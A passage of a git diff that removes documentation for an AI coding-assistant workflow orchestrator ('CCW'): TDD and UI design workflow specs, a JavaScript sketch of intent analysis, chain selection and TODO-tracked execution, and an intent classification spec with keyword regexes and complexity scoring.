E --> F[Green Phase: 测试通过]
|
||||
F --> G{需要重构?}
|
||||
G -->|Yes| H[Refactor Phase]
|
||||
H --> F
|
||||
G -->|No| I[tdd-verify]
|
||||
I --> J[质量报告]
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
| 参数 | 默认值 | 说明 |
|
||||
|------|--------|------|
|
||||
| coverage_target | 80% | 目标覆盖率 |
|
||||
| cycle_limit | 10 | 最大Red-Green-Refactor循环 |
|
||||
| strict_mode | false | 严格模式(必须先红后绿) |
|
||||
|
||||
## CLI Integration
|
||||
|
||||
| 阶段 | CLI Hint | 用途 |
|
||||
|------|----------|------|
|
||||
| tdd-plan | `gemini --mode analysis` | 分析测试策略 |
|
||||
| execute | `codex --mode write` | 实现代码 |
|
||||
| tdd-verify | `gemini --mode analysis` | 验证TDD合规性 |
|
||||
|
||||
## Slash Commands
|
||||
|
||||
```bash
|
||||
/workflow:tdd-plan # 生成TDD任务链
|
||||
/workflow:execute # 执行Red-Green-Refactor
|
||||
/workflow:tdd-verify # 验证TDD合规性+覆盖率
|
||||
```
|
||||
|
||||
## When to Use
|
||||
|
||||
- 核心业务逻辑开发
|
||||
- 需要高测试覆盖率的模块
|
||||
- 重构现有代码时确保不破坏功能
|
||||
- 团队要求TDD实践
|
||||
|
||||
## Risk Assessment
|
||||
|
||||
| 风险 | 缓解措施 |
|
||||
|------|----------|
|
||||
| 测试粒度不当 | tdd-plan阶段评估测试边界 |
|
||||
| 过度测试 | 聚焦行为而非实现 |
|
||||
| 循环过多 | cycle_limit限制 |
|
||||
@@ -1,79 +0,0 @@
|
||||
# UI Design Workflow Action
|
||||
|
||||
## Pattern
|
||||
```
|
||||
ui-design:[explore|imitate]-auto → design-sync → plan → execute
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- 关键词: "ui", "界面", "design", "组件", "样式", "布局", "前端"
|
||||
- 变体触发:
|
||||
- `imitate`: "参考", "模仿", "像", "类似"
|
||||
- `explore`: 无特定参考时默认
|
||||
|
||||
## Variants
|
||||
|
||||
### Explore (探索式设计)
|
||||
```mermaid
|
||||
graph TD
|
||||
A[User Input] --> B[ui-design:explore-auto]
|
||||
B --> C[设计系统分析]
|
||||
C --> D[组件结构规划]
|
||||
D --> E[design-sync]
|
||||
E --> F[plan]
|
||||
F --> G[execute]
|
||||
```
|
||||
|
||||
### Imitate (参考式设计)
|
||||
```mermaid
|
||||
graph TD
|
||||
A[User Input + Reference] --> B[ui-design:imitate-auto]
|
||||
B --> C[参考分析]
|
||||
C --> D[风格提取]
|
||||
D --> E[design-sync]
|
||||
E --> F[plan]
|
||||
F --> G[execute]
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
| 参数 | 默认值 | 说明 |
|
||||
|------|--------|------|
|
||||
| design_system | auto | 设计系统(auto/tailwind/mui/custom) |
|
||||
| responsive | true | 响应式设计 |
|
||||
| accessibility | true | 无障碍支持 |
|
||||
|
||||
## CLI Integration
|
||||
|
||||
| 阶段 | CLI Hint | 用途 |
|
||||
|------|----------|------|
|
||||
| explore/imitate | `gemini --mode analysis` | 设计分析、风格提取 |
|
||||
| design-sync | - | 设计决策与代码库同步 |
|
||||
| plan | - | 内置规划 |
|
||||
| execute | `codex --mode write` | 组件实现 |
|
||||
|
||||
## Slash Commands
|
||||
|
||||
```bash
|
||||
/workflow:ui-design:explore-auto # 探索式UI设计
|
||||
/workflow:ui-design:imitate-auto # 参考式UI设计
|
||||
/workflow:ui-design:design-sync # 设计与代码同步(关键步骤)
|
||||
/workflow:ui-design:style-extract # 提取现有样式
|
||||
/workflow:ui-design:codify-style # 样式代码化
|
||||
```
|
||||
|
||||
## When to Use
|
||||
|
||||
- 新页面/组件开发
|
||||
- UI重构或现代化
|
||||
- 设计系统建立
|
||||
- 参考其他产品设计
|
||||
|
||||
## Risk Assessment
|
||||
|
||||
| 风险 | 缓解措施 |
|
||||
|------|----------|
|
||||
| 设计不一致 | style-extract确保复用 |
|
||||
| 响应式问题 | 多断点验证 |
|
||||
| 可访问性缺失 | a11y检查集成 |
|
||||
@@ -1,435 +0,0 @@
|
||||
# CCW Orchestrator
|
||||
|
||||
无状态编排器:分析输入 → 选择工作流链 → TODO 跟踪执行
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
┌──────────────────────────────────────────────────────────────────┐
|
||||
│ CCW Orchestrator │
|
||||
├──────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ Phase 1: Input Analysis │
|
||||
│ ├─ Parse input (natural language / explicit command) │
|
||||
│ ├─ Classify intent (bugfix / feature / issue / ui / docs) │
|
||||
│ └─ Assess complexity (low / medium / high) │
|
||||
│ │
|
||||
│ Phase 2: Chain Selection │
|
||||
│ ├─ Load index/workflow-chains.json │
|
||||
│ ├─ Match intent → chain(s) │
|
||||
│ ├─ Filter by complexity │
|
||||
│ └─ Select optimal chain │
|
||||
│ │
|
||||
│ Phase 3: User Confirmation (optional) │
|
||||
│ ├─ Display selected chain and steps │
|
||||
│ └─ Allow modification or manual selection │
|
||||
│ │
|
||||
│ Phase 4: TODO Tracking Setup │
|
||||
│ ├─ Create TodoWrite with chain steps │
|
||||
│ └─ Mark first step as in_progress │
|
||||
│ │
|
||||
│ Phase 5: Execution Loop │
|
||||
│ ├─ Execute current step (SlashCommand) │
|
||||
│ ├─ Update TODO status (completed) │
|
||||
│ ├─ Check auto_continue flag │
|
||||
│ └─ Proceed to next step or wait for user │
|
||||
│ │
|
||||
└──────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Implementation
|
||||
|
||||
### Phase 1: Input Analysis
|
||||
|
||||
```javascript
|
||||
// Load external configuration (externalized for flexibility)
|
||||
const intentRules = JSON.parse(Read('.claude/skills/ccw/index/intent-rules.json'))
|
||||
const capabilities = JSON.parse(Read('.claude/skills/ccw/index/command-capabilities.json'))
|
||||
|
||||
function analyzeInput(userInput) {
|
||||
const input = userInput.trim()
|
||||
|
||||
// Check for explicit command passthrough
|
||||
if (input.match(/^\/(?:workflow|issue|memory|task):/)) {
|
||||
return { type: 'explicit', command: input, passthrough: true }
|
||||
}
|
||||
|
||||
// Classify intent using external rules
|
||||
const intent = classifyIntent(input, intentRules.intent_patterns)
|
||||
|
||||
// Assess complexity using external indicators
|
||||
const complexity = assessComplexity(input, intentRules.complexity_indicators)
|
||||
|
||||
// Detect tool preferences using external triggers
|
||||
const toolPreference = detectToolPreference(input, intentRules.cli_tool_triggers)
|
||||
|
||||
return {
|
||||
type: 'natural',
|
||||
text: input,
|
||||
intent,
|
||||
complexity,
|
||||
toolPreference,
|
||||
passthrough: false
|
||||
}
|
||||
}
|
||||
|
||||
function classifyIntent(text, patterns) {
|
||||
// Sort by priority
|
||||
const sorted = Object.entries(patterns)
|
||||
.sort((a, b) => a[1].priority - b[1].priority)
|
||||
|
||||
for (const [intentType, config] of sorted) {
|
||||
// Handle variants (bugfix, ui, docs)
|
||||
if (config.variants) {
|
||||
for (const [variant, variantConfig] of Object.entries(config.variants)) {
|
||||
const variantPatterns = variantConfig.patterns || variantConfig.triggers || []
|
||||
if (matchesAnyPattern(text, variantPatterns)) {
|
||||
// For bugfix, check if standard patterns also match
|
||||
if (intentType === 'bugfix') {
|
||||
const standardMatch = matchesAnyPattern(text, config.variants.standard?.patterns || [])
|
||||
if (standardMatch) {
|
||||
return { type: intentType, variant, workflow: variantConfig.workflow }
|
||||
}
|
||||
} else {
|
||||
return { type: intentType, variant, workflow: variantConfig.workflow }
|
||||
}
|
||||
}
|
||||
}
|
||||
// Check default variant
|
||||
if (config.variants.standard) {
|
||||
if (matchesAnyPattern(text, config.variants.standard.patterns)) {
|
||||
return { type: intentType, variant: 'standard', workflow: config.variants.standard.workflow }
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Handle simple patterns (exploration, tdd, review)
|
||||
if (config.patterns && !config.require_both) {
|
||||
if (matchesAnyPattern(text, config.patterns)) {
|
||||
return { type: intentType, workflow: config.workflow }
|
||||
}
|
||||
}
|
||||
|
||||
// Handle dual-pattern matching (issue_batch)
|
||||
if (config.require_both && config.patterns) {
|
||||
const matchBatch = matchesAnyPattern(text, config.patterns.batch_keywords)
|
||||
const matchAction = matchesAnyPattern(text, config.patterns.action_keywords)
|
||||
if (matchBatch && matchAction) {
|
||||
return { type: intentType, workflow: config.workflow }
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Default to feature
|
||||
return { type: 'feature' }
|
||||
}
|
||||
|
||||
function matchesAnyPattern(text, patterns) {
|
||||
if (!Array.isArray(patterns)) return false
|
||||
const lowerText = text.toLowerCase()
|
||||
return patterns.some(p => lowerText.includes(p.toLowerCase()))
|
||||
}
|
||||
|
||||
function assessComplexity(text, indicators) {
|
||||
let score = 0
|
||||
|
||||
for (const [level, config] of Object.entries(indicators)) {
|
||||
if (config.patterns) {
|
||||
for (const [category, patternConfig] of Object.entries(config.patterns)) {
|
||||
if (matchesAnyPattern(text, patternConfig.keywords)) {
|
||||
score += patternConfig.weight || 1
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (score >= indicators.high.score_threshold) return 'high'
|
||||
if (score >= indicators.medium.score_threshold) return 'medium'
|
||||
return 'low'
|
||||
}
|
||||
|
||||
function detectToolPreference(text, triggers) {
|
||||
for (const [tool, config] of Object.entries(triggers)) {
|
||||
// Check explicit triggers
|
||||
if (matchesAnyPattern(text, config.explicit)) return tool
|
||||
// Check semantic triggers
|
||||
if (matchesAnyPattern(text, config.semantic)) return tool
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 2: Chain Selection
|
||||
|
||||
```javascript
|
||||
// Load workflow chains index
|
||||
const chains = JSON.parse(Read('.claude/skills/ccw/index/workflow-chains.json'))
|
||||
|
||||
function selectChain(analysis) {
|
||||
const { intent, complexity } = analysis
|
||||
|
||||
// Map intent type (from intent-rules.json) to chain ID (from workflow-chains.json)
|
||||
const chainMapping = {
|
||||
'bugfix': 'bugfix',
|
||||
'issue_batch': 'issue', // intent-rules.json key → chains.json chain ID
|
||||
'exploration': 'full',
|
||||
'ui_design': 'ui', // intent-rules.json key → chains.json chain ID
|
||||
'tdd': 'tdd',
|
||||
'review': 'review-fix',
|
||||
'documentation': 'docs', // intent-rules.json key → chains.json chain ID
|
||||
'feature': null // Use complexity fallback
|
||||
}
|
||||
|
||||
let chainId = chainMapping[intent.type]
|
||||
|
||||
// Fallback to complexity-based selection
|
||||
if (!chainId) {
|
||||
chainId = chains.chain_selection_rules.complexity_fallback[complexity]
|
||||
}
|
||||
|
||||
const chain = chains.chains[chainId]
|
||||
|
||||
// Handle variants
|
||||
let steps = chain.steps
|
||||
if (chain.variants) {
|
||||
const variant = intent.variant || Object.keys(chain.variants)[0]
|
||||
steps = chain.variants[variant].steps
|
||||
}
|
||||
|
||||
return {
|
||||
id: chainId,
|
||||
name: chain.name,
|
||||
description: chain.description,
|
||||
steps,
|
||||
complexity: chain.complexity,
|
||||
estimated_time: chain.estimated_time
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 3: User Confirmation
|
||||
|
||||
```javascript
|
||||
function confirmChain(selectedChain, analysis) {
|
||||
// Skip confirmation for simple chains
|
||||
if (selectedChain.steps.length <= 2 && analysis.complexity === 'low') {
|
||||
return selectedChain
|
||||
}
|
||||
|
||||
console.log(`
|
||||
## CCW Workflow Selection
|
||||
|
||||
**Task**: ${analysis.text.substring(0, 80)}...
|
||||
**Intent**: ${analysis.intent.type}${analysis.intent.variant ? ` (${analysis.intent.variant})` : ''}
|
||||
**Complexity**: ${analysis.complexity}
|
||||
|
||||
**Selected Chain**: ${selectedChain.name}
|
||||
**Description**: ${selectedChain.description}
|
||||
**Estimated Time**: ${selectedChain.estimated_time}
|
||||
|
||||
**Steps**:
|
||||
${selectedChain.steps.map((s, i) => `${i + 1}. ${s.command}${s.optional ? ' (optional)' : ''}`).join('\n')}
|
||||
`)
|
||||
|
||||
const response = AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Proceed with ${selectedChain.name}?`,
|
||||
header: "Confirm",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Proceed", description: `Execute ${selectedChain.steps.length} steps` },
|
||||
{ label: "Rapid", description: "Use lite-plan → lite-execute" },
|
||||
{ label: "Full", description: "Use brainstorm → plan → execute" },
|
||||
{ label: "Manual", description: "Specify commands manually" }
|
||||
]
|
||||
}]
|
||||
})
|
||||
|
||||
// Handle alternative selection
|
||||
if (response.Confirm === 'Rapid') {
|
||||
return selectChain({ intent: { type: 'feature' }, complexity: 'low' })
|
||||
}
|
||||
if (response.Confirm === 'Full') {
|
||||
return chains.chains['full']
|
||||
}
|
||||
if (response.Confirm === 'Manual') {
|
||||
return null // User will specify
|
||||
}
|
||||
|
||||
return selectedChain
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 4: TODO Tracking Setup
|
||||
|
||||
```javascript
|
||||
function setupTodoTracking(chain, analysis) {
|
||||
const todos = chain.steps.map((step, index) => ({
|
||||
content: `[${index + 1}/${chain.steps.length}] ${step.command}`,
|
||||
status: index === 0 ? 'in_progress' : 'pending',
|
||||
activeForm: `Executing ${step.command}`
|
||||
}))
|
||||
|
||||
// Add header todo
|
||||
todos.unshift({
|
||||
content: `CCW: ${chain.name} (${chain.steps.length} steps)`,
|
||||
status: 'in_progress',
|
||||
activeForm: `Running ${chain.name} workflow`
|
||||
})
|
||||
|
||||
TodoWrite({ todos })
|
||||
|
||||
return {
|
||||
chain,
|
||||
currentStep: 0,
|
||||
todos
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 5: Execution Loop
|
||||
|
||||
```javascript
|
||||
async function executeChain(execution, analysis) {
|
||||
const { chain, todos } = execution
|
||||
let currentStep = 0
|
||||
|
||||
while (currentStep < chain.steps.length) {
|
||||
const step = chain.steps[currentStep]
|
||||
|
||||
// Update TODO: mark current as in_progress
|
||||
const updatedTodos = todos.map((t, i) => ({
|
||||
...t,
|
||||
status: i === 0
|
||||
? 'in_progress'
|
||||
: i === currentStep + 1
|
||||
? 'in_progress'
|
||||
: i <= currentStep
|
||||
? 'completed'
|
||||
: 'pending'
|
||||
}))
|
||||
TodoWrite({ todos: updatedTodos })
|
||||
|
||||
console.log(`\n### Step ${currentStep + 1}/${chain.steps.length}: ${step.command}\n`)
|
||||
|
||||
// Check for confirmation requirement
|
||||
if (step.confirm_before) {
|
||||
const proceed = AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Ready to execute ${step.command}?`,
|
||||
header: "Step",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Execute", description: "Run this step" },
|
||||
{ label: "Skip", description: "Skip to next step" },
|
||||
{ label: "Abort", description: "Stop workflow" }
|
||||
]
|
||||
}]
|
||||
})
|
||||
|
||||
if (proceed.Step === 'Skip') {
|
||||
currentStep++
|
||||
continue
|
||||
}
|
||||
if (proceed.Step === 'Abort') {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
// Execute the command
|
||||
const args = analysis.text
|
||||
SlashCommand(step.command, { args })
|
||||
|
||||
// Mark step as completed
|
||||
updatedTodos[currentStep + 1].status = 'completed'
|
||||
TodoWrite({ todos: updatedTodos })
|
||||
|
||||
currentStep++
|
||||
|
||||
// Check auto_continue
|
||||
if (!step.auto_continue && currentStep < chain.steps.length) {
|
||||
console.log(`
|
||||
Step completed. Next: ${chain.steps[currentStep].command}
|
||||
Type "continue" to proceed or specify different action.
|
||||
`)
|
||||
// Wait for user input before continuing
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
// Final status
|
||||
if (currentStep >= chain.steps.length) {
|
||||
const finalTodos = todos.map(t => ({ ...t, status: 'completed' }))
|
||||
TodoWrite({ todos: finalTodos })
|
||||
|
||||
console.log(`\n✓ ${chain.name} workflow completed (${chain.steps.length} steps)`)
|
||||
}
|
||||
|
||||
return { completed: currentStep, total: chain.steps.length }
|
||||
}
|
||||
```
|
||||
|
||||
## Main Orchestration Entry
|
||||
|
||||
```javascript
|
||||
async function ccwOrchestrate(userInput) {
|
||||
console.log('## CCW Orchestrator\n')
|
||||
|
||||
// Phase 1: Analyze input
|
||||
const analysis = analyzeInput(userInput)
|
||||
|
||||
// Handle explicit command passthrough
|
||||
if (analysis.passthrough) {
|
||||
console.log(`Direct command: ${analysis.command}`)
|
||||
return SlashCommand(analysis.command)
|
||||
}
|
||||
|
||||
// Phase 2: Select chain
|
||||
const selectedChain = selectChain(analysis)
|
||||
|
||||
// Phase 3: Confirm (for complex workflows)
|
||||
const confirmedChain = confirmChain(selectedChain, analysis)
|
||||
if (!confirmedChain) {
|
||||
console.log('Manual mode selected. Specify commands directly.')
|
||||
return
|
||||
}
|
||||
|
||||
// Phase 4: Setup TODO tracking
|
||||
const execution = setupTodoTracking(confirmedChain, analysis)
|
||||
|
||||
// Phase 5: Execute
|
||||
const result = await executeChain(execution, analysis)
|
||||
|
||||
return result
|
||||
}
|
||||
```
|
||||
|
||||
## Decision Matrix
|
||||
|
||||
| Intent | Complexity | Chain | Steps |
|
||||
|--------|------------|-------|-------|
|
||||
| bugfix (standard) | * | bugfix | lite-fix |
|
||||
| bugfix (hotfix) | * | bugfix | lite-fix --hotfix |
|
||||
| issue | * | issue | plan → queue → execute |
|
||||
| exploration | * | full | brainstorm → plan → execute |
|
||||
| ui (explore) | * | ui | ui-design:explore → sync → plan → execute |
|
||||
| ui (imitate) | * | ui | ui-design:imitate → sync → plan → execute |
|
||||
| tdd | * | tdd | tdd-plan → execute → tdd-verify |
|
||||
| review | * | review-fix | review-session-cycle → review-fix |
|
||||
| docs | low | docs | update-related |
|
||||
| docs | medium+ | docs | docs → execute |
|
||||
| feature | low | rapid | lite-plan → lite-execute |
|
||||
| feature | medium | coupled | plan → verify → execute |
|
||||
| feature | high | full | brainstorm → plan → execute |
|
||||
|
||||
## Continuation Commands
|
||||
|
||||
After each step pause:
|
||||
|
||||
| User Input | Action |
|
||||
|------------|--------|
|
||||
| `continue` | Execute next step |
|
||||
| `skip` | Skip current step |
|
||||
| `abort` | Stop workflow |
|
||||
| `/workflow:*` | Execute specific command |
|
||||
| Natural language | Re-analyze and potentially switch chains |
|
||||
@@ -1,336 +0,0 @@
|
||||
# Intent Classification Specification
|
||||
|
||||
CCW 意图分类规范:定义如何从用户输入识别任务意图并选择最优工作流。
|
||||
|
||||
## Classification Hierarchy
|
||||
|
||||
```
|
||||
Intent Classification
|
||||
├── Priority 1: Explicit Commands
|
||||
│ └── /workflow:*, /issue:*, /memory:*, /task:*
|
||||
├── Priority 2: Bug Keywords
|
||||
│ ├── Hotfix: urgent + bug keywords
|
||||
│ └── Standard: bug keywords only
|
||||
├── Priority 3: Issue Batch
|
||||
│ └── Multiple + fix keywords
|
||||
├── Priority 4: Exploration
|
||||
│ └── Uncertainty keywords
|
||||
├── Priority 5: UI/Design
|
||||
│ └── Visual/component keywords
|
||||
└── Priority 6: Complexity Fallback
|
||||
├── High → Coupled
|
||||
├── Medium → Rapid
|
||||
└── Low → Rapid
|
||||
```
|
||||
|
||||
## Keyword Patterns
|
||||
|
||||
### Bug Detection
|
||||
|
||||
```javascript
|
||||
const BUG_PATTERNS = {
|
||||
core: /\b(fix|bug|error|issue|crash|broken|fail|wrong|incorrect|修复|报错|错误|问题|异常|崩溃|失败)\b/i,
|
||||
|
||||
urgency: /\b(hotfix|urgent|production|critical|emergency|asap|immediately|紧急|生产|线上|马上|立即)\b/i,
|
||||
|
||||
symptoms: /\b(not working|doesn't work|can't|cannot|won't|stopped|stopped working|无法|不能|不工作)\b/i,
|
||||
|
||||
errors: /\b(\d{3}\s*error|exception|stack\s*trace|undefined|null\s*pointer|timeout)\b/i
|
||||
}
|
||||
|
||||
function detectBug(text) {
|
||||
const isBug = BUG_PATTERNS.core.test(text) || BUG_PATTERNS.symptoms.test(text)
|
||||
const isUrgent = BUG_PATTERNS.urgency.test(text)
|
||||
const hasError = BUG_PATTERNS.errors.test(text)
|
||||
|
||||
if (!isBug && !hasError) return null
|
||||
|
||||
return {
|
||||
type: 'bugfix',
|
||||
mode: isUrgent ? 'hotfix' : 'standard',
|
||||
confidence: (isBug && hasError) ? 'high' : 'medium'
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Issue Batch Detection
|
||||
|
||||
```javascript
|
||||
const ISSUE_PATTERNS = {
|
||||
batch: /\b(issues?|batch|queue|multiple|several|all|多个|批量|一系列|所有|这些)\b/i,
|
||||
action: /\b(fix|resolve|handle|process|处理|解决|修复)\b/i,
|
||||
source: /\b(github|jira|linear|backlog|todo|待办)\b/i
|
||||
}
|
||||
|
||||
function detectIssueBatch(text) {
|
||||
const hasBatch = ISSUE_PATTERNS.batch.test(text)
|
||||
const hasAction = ISSUE_PATTERNS.action.test(text)
|
||||
const hasSource = ISSUE_PATTERNS.source.test(text)
|
||||
|
||||
if (hasBatch && hasAction) {
|
||||
return {
|
||||
type: 'issue',
|
||||
confidence: hasSource ? 'high' : 'medium'
|
||||
}
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
### Exploration Detection
|
||||
|
||||
```javascript
|
||||
const EXPLORATION_PATTERNS = {
|
||||
uncertainty: /\b(不确定|不知道|not sure|unsure|how to|怎么|如何|what if|should i|could i|是否应该)\b/i,
|
||||
|
||||
exploration: /\b(explore|research|investigate|分析|研究|调研|评估|探索|了解)\b/i,
|
||||
|
||||
options: /\b(options|alternatives|approaches|方案|选择|方向|可能性)\b/i,
|
||||
|
||||
questions: /\b(what|which|how|why|什么|哪个|怎样|为什么)\b.*\?/i
|
||||
}
|
||||
|
||||
function detectExploration(text) {
|
||||
const hasUncertainty = EXPLORATION_PATTERNS.uncertainty.test(text)
|
||||
const hasExploration = EXPLORATION_PATTERNS.exploration.test(text)
|
||||
const hasOptions = EXPLORATION_PATTERNS.options.test(text)
|
||||
const hasQuestion = EXPLORATION_PATTERNS.questions.test(text)
|
||||
|
||||
const score = [hasUncertainty, hasExploration, hasOptions, hasQuestion].filter(Boolean).length
|
||||
|
||||
if (score >= 2 || hasUncertainty) {
|
||||
return {
|
||||
type: 'exploration',
|
||||
confidence: score >= 3 ? 'high' : 'medium'
|
||||
}
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
### UI/Design Detection
|
||||
|
||||
```javascript
|
||||
const UI_PATTERNS = {
|
||||
components: /\b(ui|界面|component|组件|button|按钮|form|表单|modal|弹窗|dialog|对话框)\b/i,
|
||||
|
||||
design: /\b(design|设计|style|样式|layout|布局|theme|主题|color|颜色)\b/i,
|
||||
|
||||
visual: /\b(visual|视觉|animation|动画|responsive|响应式|mobile|移动端)\b/i,
|
||||
|
||||
frontend: /\b(frontend|前端|react|vue|angular|css|html|page|页面)\b/i
|
||||
}
|
||||
|
||||
function detectUI(text) {
|
||||
const hasComponents = UI_PATTERNS.components.test(text)
|
||||
const hasDesign = UI_PATTERNS.design.test(text)
|
||||
const hasVisual = UI_PATTERNS.visual.test(text)
|
||||
const hasFrontend = UI_PATTERNS.frontend.test(text)
|
||||
|
||||
const score = [hasComponents, hasDesign, hasVisual, hasFrontend].filter(Boolean).length
|
||||
|
||||
if (score >= 2) {
|
||||
return {
|
||||
type: 'ui',
|
||||
hasReference: /参考|reference|based on|像|like|模仿|imitate/.test(text),
|
||||
confidence: score >= 3 ? 'high' : 'medium'
|
||||
}
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
## Complexity Assessment
|
||||
|
||||
### Indicators
|
||||
|
||||
```javascript
|
||||
const COMPLEXITY_INDICATORS = {
|
||||
high: {
|
||||
patterns: [
|
||||
/\b(refactor|重构|restructure|重新组织)\b/i,
|
||||
/\b(migrate|迁移|upgrade|升级|convert|转换)\b/i,
|
||||
/\b(architect|架构|system|系统|infrastructure|基础设施)\b/i,
|
||||
/\b(entire|整个|complete|完整|all\s+modules?|所有模块)\b/i,
|
||||
/\b(security|安全|scale|扩展|performance\s+critical|性能关键)\b/i,
|
||||
/\b(distributed|分布式|microservice|微服务|cluster|集群)\b/i
|
||||
],
|
||||
weight: 2
|
||||
},
|
||||
|
||||
medium: {
|
||||
patterns: [
|
||||
/\b(integrate|集成|connect|连接|link|链接)\b/i,
|
||||
/\b(api|database|数据库|service|服务|endpoint|接口)\b/i,
|
||||
/\b(test|测试|validate|验证|coverage|覆盖)\b/i,
|
||||
/\b(multiple\s+files?|多个文件|several\s+components?|几个组件)\b/i,
|
||||
/\b(authentication|认证|authorization|授权)\b/i
|
||||
],
|
||||
weight: 1
|
||||
},
|
||||
|
||||
low: {
|
||||
patterns: [
|
||||
/\b(add|添加|create|创建|simple|简单)\b/i,
|
||||
/\b(update|更新|modify|修改|change|改变)\b/i,
|
||||
/\b(single|单个|one|一个|small|小)\b/i,
|
||||
/\b(comment|注释|log|日志|print|打印)\b/i
|
||||
],
|
||||
weight: -1
|
||||
}
|
||||
}
|
||||
|
||||
function assessComplexity(text) {
|
||||
let score = 0
|
||||
|
||||
for (const [level, config] of Object.entries(COMPLEXITY_INDICATORS)) {
|
||||
for (const pattern of config.patterns) {
|
||||
if (pattern.test(text)) {
|
||||
score += config.weight
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File count indicator
|
||||
const fileMatches = text.match(/\b\d+\s*(files?|文件)/i)
|
||||
if (fileMatches) {
|
||||
const count = parseInt(fileMatches[0])
|
||||
if (count > 10) score += 2
|
||||
else if (count > 5) score += 1
|
||||
}
|
||||
|
||||
// Module count indicator
|
||||
const moduleMatches = text.match(/\b\d+\s*(modules?|模块)/i)
|
||||
if (moduleMatches) {
|
||||
const count = parseInt(moduleMatches[0])
|
||||
if (count > 3) score += 2
|
||||
else if (count > 1) score += 1
|
||||
}
|
||||
|
||||
if (score >= 4) return 'high'
|
||||
if (score >= 2) return 'medium'
|
||||
return 'low'
|
||||
}
|
||||
```
|
||||
|
||||
## Workflow Selection Matrix
|
||||
|
||||
| Intent | Complexity | Workflow | Commands |
|
||||
|--------|------------|----------|----------|
|
||||
| bugfix (hotfix) | * | bugfix | `lite-fix --hotfix` |
|
||||
| bugfix (standard) | * | bugfix | `lite-fix` |
|
||||
| issue | * | issue | `issue:plan → queue → execute` |
|
||||
| exploration | * | full | `brainstorm → plan → execute` |
|
||||
| ui (reference) | * | ui | `ui-design:imitate-auto → plan` |
|
||||
| ui (explore) | * | ui | `ui-design:explore-auto → plan` |
|
||||
| feature | high | coupled | `plan → verify → execute` |
|
||||
| feature | medium | rapid | `lite-plan → lite-execute` |
|
||||
| feature | low | rapid | `lite-plan → lite-execute` |
|
||||
|
||||
## Confidence Levels
|
||||
|
||||
| Level | Description | Action |
|
||||
|-------|-------------|--------|
|
||||
| **high** | Multiple strong indicators match | Direct dispatch |
|
||||
| **medium** | Some indicators match | Confirm with user |
|
||||
| **low** | Fallback classification | Always confirm |
|
||||
|
||||
## Tool Preference Detection
|
||||
|
||||
```javascript
|
||||
const TOOL_PREFERENCES = {
|
||||
gemini: {
|
||||
pattern: /用\s*gemini|gemini\s*(分析|理解|设计)|让\s*gemini/i,
|
||||
capability: 'analysis'
|
||||
},
|
||||
qwen: {
|
||||
pattern: /用\s*qwen|qwen\s*(分析|评估)|让\s*qwen/i,
|
||||
capability: 'analysis'
|
||||
},
|
||||
codex: {
|
||||
pattern: /用\s*codex|codex\s*(实现|重构|修复)|让\s*codex/i,
|
||||
capability: 'implementation'
|
||||
}
|
||||
}
|
||||
|
||||
function detectToolPreference(text) {
|
||||
for (const [tool, config] of Object.entries(TOOL_PREFERENCES)) {
|
||||
if (config.pattern.test(text)) {
|
||||
return { tool, capability: config.capability }
|
||||
}
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
## Multi-Tool Collaboration Detection
|
||||
|
||||
```javascript
|
||||
const COLLABORATION_PATTERNS = {
|
||||
sequential: /先.*(分析|理解).*然后.*(实现|重构)|分析.*后.*实现/i,
|
||||
parallel: /(同时|并行).*(分析|实现)|一边.*一边/i,
|
||||
hybrid: /(分析|设计).*和.*(实现|测试).*分开/i
|
||||
}
|
||||
|
||||
function detectCollaboration(text) {
|
||||
if (COLLABORATION_PATTERNS.sequential.test(text)) {
|
||||
return { mode: 'sequential', description: 'Analysis first, then implementation' }
|
||||
}
|
||||
if (COLLABORATION_PATTERNS.parallel.test(text)) {
|
||||
return { mode: 'parallel', description: 'Concurrent analysis and implementation' }
|
||||
}
|
||||
if (COLLABORATION_PATTERNS.hybrid.test(text)) {
|
||||
return { mode: 'hybrid', description: 'Mixed parallel and sequential' }
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
## Classification Pipeline
|
||||
|
||||
```javascript
|
||||
function classify(userInput) {
|
||||
const text = userInput.trim()
|
||||
|
||||
// Step 1: Check explicit commands
|
||||
if (/^\/(?:workflow|issue|memory|task):/.test(text)) {
|
||||
return { type: 'explicit', command: text }
|
||||
}
|
||||
|
||||
// Step 2: Priority-based classification
|
||||
const bugResult = detectBug(text)
|
||||
if (bugResult) return bugResult
|
||||
|
||||
const issueResult = detectIssueBatch(text)
|
||||
if (issueResult) return issueResult
|
||||
|
||||
const explorationResult = detectExploration(text)
|
||||
if (explorationResult) return explorationResult
|
||||
|
||||
const uiResult = detectUI(text)
|
||||
if (uiResult) return uiResult
|
||||
|
||||
// Step 3: Complexity-based fallback
|
||||
const complexity = assessComplexity(text)
|
||||
return {
|
||||
type: 'feature',
|
||||
complexity,
|
||||
workflow: complexity === 'high' ? 'coupled' : 'rapid',
|
||||
confidence: 'low'
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Input → Classification
|
||||
|
